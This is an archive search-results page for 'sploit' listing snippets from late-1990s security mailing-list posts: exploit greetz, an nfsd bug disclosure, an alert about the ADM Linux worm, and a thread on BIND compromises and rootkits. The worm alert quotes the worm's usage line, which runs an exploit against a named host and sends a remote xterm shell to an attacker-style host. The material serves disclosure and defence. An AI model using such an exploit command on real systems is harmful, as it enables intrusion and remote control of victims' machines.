search for: sploit

Displaying 4 results from an estimated 4 matches for "sploit".

Did you mean: split
1997 Sep 26
3
Forwarded mail....
...caL buffer overflow! found & exploited by some "blaireaux" and "mr3615phf" :))))))))))) <joke> recursive greetz: ADM ! a special greetz to the ppl of the "offset effort" fr4wd,fratalG,and the rest of t0xyn , and my friend [oO giemor Oo] <yes i have a sploit :) ,kod,theblade,reformed,m0sfet,kewl,oldmaster,owl,th0s gigaacidbrutalhardcorebigextra greetz to da Beautiful: Heike <i'am in heIk3c0re>. big up to: da movement <stay cool ! >. codeurz greetz going to: aleph1 <the guru its ALL !> & to samba team <i love samba :) rea...
1999 Nov 10
0
Re: undocumented bugs - nfsd
On Tue, Nov 09, 1999 at 11:39:39AM +0100, Mariusz Marcinkiewicz wrote: > After reading lcamtuf's posts I decided write this one. Few months ago one > of my friends - digit - found bug in linux nfsd daemon. I made example > sploit about IV 1999. Now in distributions is new nfsd and nowhere was > information about security weaknes of old version! Well, one gets used to people posting to bugtraq without bothering to send any mail whatsoever to the maintainer of a free software package. But whining about the bug not having...
1999 Mar 26
3
*ALERT*: ADM Worm. Worm for Linux x86 found in wild.
...# LIFE IS A BITCH, BE HARDCORE WITH 'EM, DONT FINISH LIKE ME ! # ********************* THE CREW WILL NEVER DIE *************************** EMAIL="admsmb@hotmail.com" SAY="The ADM Inet w0rm is here !" -----Hnamed---- --= The ADM CreW =-- %s victim arg0 arg1 ... ex:sploits www.juergen.ch /usr/X11R6/bin/xterm -display ppp666.hax0r.com:0 ----- The worm is particularly amusing in that when run, along with portscanning, wiping logs, and all the other usual things you'd expect a worm to do, it also hunts for files with a .html suffix and inserts the contents of t...
1998 May 23
7
Re: Re: Re: Bind Overrun Bug and Linux (fwd)
> > systems which no longer seem to have this. This file contained an archive of > > the trojan''s that were inserted into the compromised system - does anybody know > > what is in these trojans? > > Check the Linux RootKit ... (LRK).. > > Typically LRK to use config-files.. (and typically LRK-users to place > files in /dev.. find /dev -type f | grep -v